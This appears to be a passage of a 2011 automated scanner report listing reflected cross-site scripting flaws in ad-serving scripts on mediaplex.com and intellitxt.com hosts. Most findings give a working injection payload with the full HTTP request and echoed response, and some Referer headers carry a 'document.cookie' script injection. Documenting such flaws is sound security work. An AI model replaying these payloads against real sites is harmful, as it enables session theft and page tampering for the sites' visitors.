function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c132"%3balert(1)//d6444155405 was submitted in the mpvc parameter. This input was echoed as 9c132";alert(1)//d6444155405 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-1%3Fmpt%3D%25r&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=5213641310;k=9c132"%3balert(1)//d6444155405 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:48:27 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 23:20:16 GMT ETag: "3b3dad-bfd-49ab3f5880c00" Accept-Ranges: bytes Content-Length: 6126 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8f7"%3balert(1)//b499e39d0ce was submitted in the mpck parameter. This input was echoed as 1f8f7";alert(1)//b499e39d0ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-0%3Fmpt%3D%25r1f8f7"%3balert(1)//b499e39d0ce&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=8677821385;k= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:48:24 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 23:20:06 GMT ETag: "3b3daa-bf5-49ab3f4ef7580" Accept-Ranges: bytes Content-Length: 6142 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b950"%3balert(1)//36978161dc7 was submitted in the mpvc parameter. This input was echoed as 1b950";alert(1)//36978161dc7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-0%3Fmpt%3D%25r&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=8677821385;k=1b950"%3balert(1)//36978161dc7 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:48:42 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 23:20:06 GMT ETag: "3b3daa-bf5-49ab3f4ef7580" Accept-Ranges: bytes Content-Length: 6118 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9eced%3balert(1)//957d74fd0a9 was submitted in the jscallback parameter. This input was echoed as 9eced;alert(1)//957d74fd0a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110218152936&cc=us&hk=1&ipid=26006&mh=4ccbd227c914fe0ad20c83f2c32d6d2d&pvm=91e816d4e263650ab854db91045f7b68&pvu=221E92B9864D44419082D8D9A665E825&rcc=us&so=0&prf=ll%3A550%7Cintl%3A1818%7Cpreprochrome%3A4%7Cgetconchrome%3A262%7Ccontint%3A38513%7Ccontl%3A40599%7Cadvint%3A1275%7Cadvl%3A41874%7Ctl%3A41874&jscallback=$iTXT.js.callback319eced%3balert(1)//957d74fd0a9 HTTP/1.1 Host: intranetjournal.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:29:04 GMT; Path=/ Content-Type: text/javascript Content-Length: 66 Date: Fri, 18 Feb 2011 15:29:04 GMT Age: 0 Connection: keep-alive
3.36. http://intranetjournal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://intranetjournal.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ffa8'-alert(1)-'e8073eb4a9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=26006&2ffa8'-alert(1)-'e8073eb4a9e=1 HTTP/1.1 Host: intranetjournal.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wcAAAEuOWEglgA-
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWIx3AA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:27:39 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWIx3QA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:27:39 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:27:39 GMT Age: 0 Connection: keep-alive Content-Length: 10605
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... p://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218152739";})();$iTXT.js.serverUrl='http://intranetjournal.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26006&2ffa8'-alert(1)-'e8073eb4a9e=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31dd1%3balert(1)//9f86d76e19c was submitted in the jscallback parameter. This input was echoed as 31dd1;alert(1)//9f86d76e19c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/advert?ts=1298042975642&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&sid=4ccbd227c914fe0ad20c83f2c32d6d2d&pvu=221E92B9864D44419082D8D9A665E825&pvm=91e816d4e263650ab854db91045f7b68&ipid=26006&cc=us&rcc=us®=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback3031dd1%3balert(1)//9f86d76e19c HTTP/1.1 Host: intranetjournal.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 156 Date: Fri, 18 Feb 2011 15:29:17 GMT Age: 0 Connection: keep-alive
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f6fe4%3balert(1)//4bff4cebd35 was submitted in the jscallback parameter. This input was echoed as f6fe4;alert(1)//4bff4cebd35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1298042937129&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&sid=4ccbd227c914fe0ad20c83f2c32d6d2d&pvu=221E92B9864D44419082D8D9A665E825&pvm=91e816d4e263650ab854db91045f7b68&ipid=26006&cc=us&rcc=us®=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=63528&jsoncl=26447&ppc=-1&hn=144&chunkkey=26006:4ccbd227c914fe0ad20c83f2c32d6d2d:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A1%2Cc%3A%22Intranet%20Journal's%20new%20discussion%20forum%20lets%20you%20ask%20for%20opinions%2C%20get%20answers%20to%20questions%2C%20and%20discuss%20Intranet%20Journal%20articles.%20%5B%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A2%2Cc%3A%22Online%20pests%20can%20range%20from%20the%20annoying%20to%20the%20downright%20dangerous.%20This%20Intranet%20Journal%20guide%20takes%20a%20step-by-step%20approach%20to%20diagnosing%2C%20removing%20and%20preventing%20spyware%20infestations.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A3%2Cc%3A%22For%20six%20months%20in%202004%2C%20Intranet%20Journal's%20Peter%20Zeidman%20published%20a%20tutorial%20on%20using%20the%20PHP%20programming%20language%20to%20build%20a%20content%20management%20system%20(CMS).%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A4%2Cc%3A%22We've%20developed%20a%20knowledge%20base%20from%20Intranet%20Journal%20articles%20to%20help%20our%20readers%20find%20the%20answer%20to%20common%20questions.%20When%20used%20with%20the%20Intranet%20Journal%20Discussion%20Forum%2C%20our%20How%20Do%20I...%20section%20harnesses%20the%20experience%20of%20Intranet%20Journal%20reader&chunk=0&total=29&jscallback=$iTXT.js.callback1f6fe4%3balert(1)//4bff4cebd35 HTTP/1.1 Host: intranetjournal.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Fri, 18 Feb 2011 15:28:55 GMT Age: 0 Connection: keep-alive
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2fcb1%3balert(1)//84127e4a12 was submitted in the jscallback parameter. This input was echoed as 2fcb1;alert(1)//84127e4a12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1298042935593&pagecl=63528&fv=10&muid=&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&ipid=26006&jscallback=$iTXT.js.callback02fcb1%3balert(1)//84127e4a12 HTTP/1.1 Host: intranetjournal.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:29:23 GMT Age: 0 Connection: keep-alive Content-Length: 6789
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback02fcb1;alert(1)//84127e4a12({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
3.40. http://intranetjournal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://intranetjournal.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19a56"-alert(1)-"0cbe1950df3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1298042935593&pagecl=63528&fv=10&muid=&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&ipid=26006&jscallback=$iTXT.js.callback0&19a56"-alert(1)-"0cbe1950df3=1 HTTP/1.1 Host: intranetjournal.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:29:28 GMT Age: 0 Connection: keep-alive Content-Length: 6772
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... |undefined==$iTXT.glob.dbgParams){$iTXT.glob.dbgParams=new $iTXT.data.Param($iTXT.glob.dbParams,undefined,undefined,'DEBUG');}$iTXT.glob.dbgParams.set({"pagecl":"63528","fv":"10","ts":"1298042935593","19a56"-alert(1)-"0cbe1950df3":"1","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":""," ...[SNIP]...
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8144e%3balert(1)//c0aabcee0cf was submitted in the jscallback parameter. This input was echoed as 8144e;alert(1)//c0aabcee0cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110218124834&adid=0%2C373510%2C0%2C0%2C373510%2C373510&cc=us&di=30028492%2C29977856%2C30069772%2C30028503%2C29977871%2C29977857&hk=1&ipid=26025&mh=9e64e9ea6ebafdfc983d191cb3c49a05&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=a214e9824c8aacf40b30520ffa06754c&pvu=CC42539E2EFA4A5E8A9F4A7DDC7AEA6C&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=316%2C479%3B688%2C595%3B207%2C767%3B537%2C1142%3B852%2C1274%3B546%2C1590%3B&prf=ll%3A1886%7Cintl%3A3584%7Cpreprochrome%3A40%7Cgetconchrome%3A110%7Cadvint%3A3735%7Cadvl%3A3735%7Ctl%3A3943&jscallback=$iTXT.js.callback18144e%3balert(1)//c0aabcee0cf HTTP/1.1 Host: isp-planet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 12:51:16 GMT; Path=/ Content-Type: text/javascript Content-Length: 65 Date: Fri, 18 Feb 2011 12:51:16 GMT Age: 0 Connection: keep-alive
3.42. http://isp-planet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://isp-planet.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbfda'-alert(1)-'069187f932f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=26025&fbfda'-alert(1)-'069187f932f=1 HTTP/1.1 Host: isp-planet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR="AAGxQQ1Wo0RyjESJ/pnB21EAADqvAAA66wEAAAEuOM+wMgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Tue, 19-Apr-2011 12:47:38 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AJAg5HHA0kpbvkwgdllNuSgAADqvAAA66wEAAAEuOM+wMgA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 12:47:38 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 12:47:38 GMT Age: 0 Connection: keep-alive Content-Length: 10600
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... ="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218124738";})();$iTXT.js.serverUrl='http://isp-planet.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26025&fbfda'-alert(1)-'069187f932f=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a4ad6%3balert(1)//1ae24b5acbe was submitted in the jscallback parameter. This input was echoed as a4ad6;alert(1)//1ae24b5acbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1298042884118&refurl=http%3A%2F%2Fwww.isp-planet.com%2Fabout%2Fsitemap.html%3Ffd8e5--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed97a1fbd30c%3D1&sid=38ce1acdaee97bceafab0c5291679b09&pvu=B988269E926D4B129A1A142EE87DC5DB&pvm=e624adf16f3feadf574c1742b8fd1efa&ipid=26025&cc=us&rcc=us®=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=33114&jsoncl=127&ppc=-1&hn=1&chunkkey=26025:38ce1acdaee97bceafab0c5291679b09:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A1%2Cc%3A%22Copyright%202011%20QuinStreet%20Inc.%20All%20Rights%20Reserved.%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D&chunk=0&total=1&jscallback=$iTXT.js.callback1a4ad6%3balert(1)//1ae24b5acbe HTTP/1.1 Host: isp-planet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wcAAAEuOWEglgA-
Response
